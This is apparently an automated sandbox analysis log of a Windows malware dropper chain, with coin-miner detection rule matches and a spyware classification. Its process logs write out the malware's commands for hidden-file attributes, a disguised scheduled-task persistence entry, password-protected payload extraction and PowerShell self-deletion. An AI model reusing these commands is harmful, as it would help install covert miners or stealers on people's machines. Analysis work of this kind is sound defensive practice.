                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043C1BB10_2_0043C1BB
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043C1B910_2_0043C1B9
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0040CA5010_2_0040CA50
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00430A6010_2_00430A60
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00435A7010_2_00435A70
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042720210_2_00427202
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00425A1610_2_00425A16
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043CAD010_2_0043CAD0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043C2E010_2_0043C2E0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00424AF010_2_00424AF0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004262FB10_2_004262FB
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00428AFD10_2_00428AFD
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00426AA110_2_00426AA1
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0040935010_2_00409350
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0040E35C10_2_0040E35C
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0040B35D10_2_0040B35D
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00402B6010_2_00402B60
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0040430010_2_00404300
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042732710_2_00427327
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004373C910_2_004373C9
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00420BF010_2_00420BF0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043C38010_2_0043C380
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00429BA010_2_00429BA0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00436BA010_2_00436BA0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0040745010_2_00407450
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0041946010_2_00419460
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042346010_2_00423460
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0041DC0010_2_0041DC00
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043C41010_2_0043C410
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00427C2010_2_00427C20
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00404C3010_2_00404C30
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0040ACC010_2_0040ACC0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00410CC910_2_00410CC9
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043D4D010_2_0043D4D0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0041448610_2_00414486
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004274A010_2_004274A0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0040BD6710_2_0040BD67
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0041D57010_2_0041D570
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00413DE210_2_00413DE2
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043CDF010_2_0043CDF0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004235A010_2_004235A0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004255B010_2_004255B0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042B64110_2_0042B641
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00421E5D10_2_00421E5D
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042C66110_2_0042C661
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0040667010_2_00406670
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00405E2010_2_00405E20
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00424ECC10_2_00424ECC
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042BED510_2_0042BED5
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004396F010_2_004396F0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042868F10_2_0042868F
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0041CE9010_2_0041CE90
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042C69E10_2_0042C69E
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042C6B010_2_0042C6B0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00438EB010_2_00438EB0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042675110_2_00426751
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0040E76010_2_0040E760
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00433F6810_2_00433F68
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00402F0010_2_00402F00
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043B70E10_2_0043B70E
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00427F3910_2_00427F39
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004117F010_2_004117F0
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042178010_2_00421780
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0042D7B510_2_0042D7B5
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00D9100010_2_00D91000
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00D94C8C10_2_00D94C8C
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00DA6F3A10_2_00DA6F3A
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: Security
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0062D663 appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0062D942 appears 86 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00648E10 appears 47 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00627A00 appears 39 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0062D64E appears 79 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 006280C0 appears 393 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0062DF80 appears 82 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FC80C0 appears 130 times
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: String function: 00D95190 appears 92 times
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: String function: 00D9B767 appears 42 times
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: String function: 00408010 appears 45 times
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: String function: 00413DC0 appears 64 times
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: String function: 00D9F534 appears 34 times
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 948 -s 648
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 37.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 37.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.2266ccd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.2266ccd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.2266ccd0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 36.3.Intel_PTT_EK_Recertification.exe.2266ccd0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 00000024.00000003.3203826106.000002266CCD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9976956318119891
                          Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9976956318119891
                          Source: random[1].exe.6.drStatic PE information: Section: ZLIB complexity 0.9955279923892989
                          Source: random[1].exe.6.drStatic PE information: Section: hrqcmbfk ZLIB complexity 0.9921549873259685
                          Source: 1459165c97.exe.6.drStatic PE information: Section: ZLIB complexity 0.9955279923892989
                          Source: 1459165c97.exe.6.drStatic PE information: Section: hrqcmbfk ZLIB complexity 0.9921549873259685
                          Source: random[1].exe0.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                          Source: random[1].exe0.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                          Source: 5639a58f3b.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                          Source: 5639a58f3b.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                          Source: random[1].exe1.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                          Source: random[1].exe1.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                          Source: 850609077b.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                          Source: 850609077b.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                          Source: 1459165c97.exe, 0000002A.00000003.3304162838.00000000057A8000.00000004.00001000.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000002.3344442804.0000000000FC9000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                          Source: 1459165c97.exe, 0000002A.00000003.3304162838.00000000057A8000.00000004.00001000.00020000.00000000.sdmp, 1459165c97.exe, 0000002A.00000002.3344442804.0000000000FC9000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                          Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@70/40@3/6
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_004361F0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,10_2_004361F0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
                          Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-41f5ca1f-12f2-e123ed-b12badd5efaa}
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3580:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1208:120:WilError_03
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: 5639a58f3b.exe, 0000000A.00000003.3209392966.0000000003866000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3285731462.0000000003849000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3210101650.0000000003849000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3361198212.0000000003A65000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240637797.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3241335849.0000000003A67000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: file.exeReversingLabs: Detection: 52%
                          Source: file.exeVirustotal: Detection: 56%
                          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe "C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeProcess created: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe "C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe "C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeProcess created: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe "C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe "C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                          Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe "C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 948 -s 648
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe "C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe "C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe "C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe "C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeProcess created: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe "C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeProcess created: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe "C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
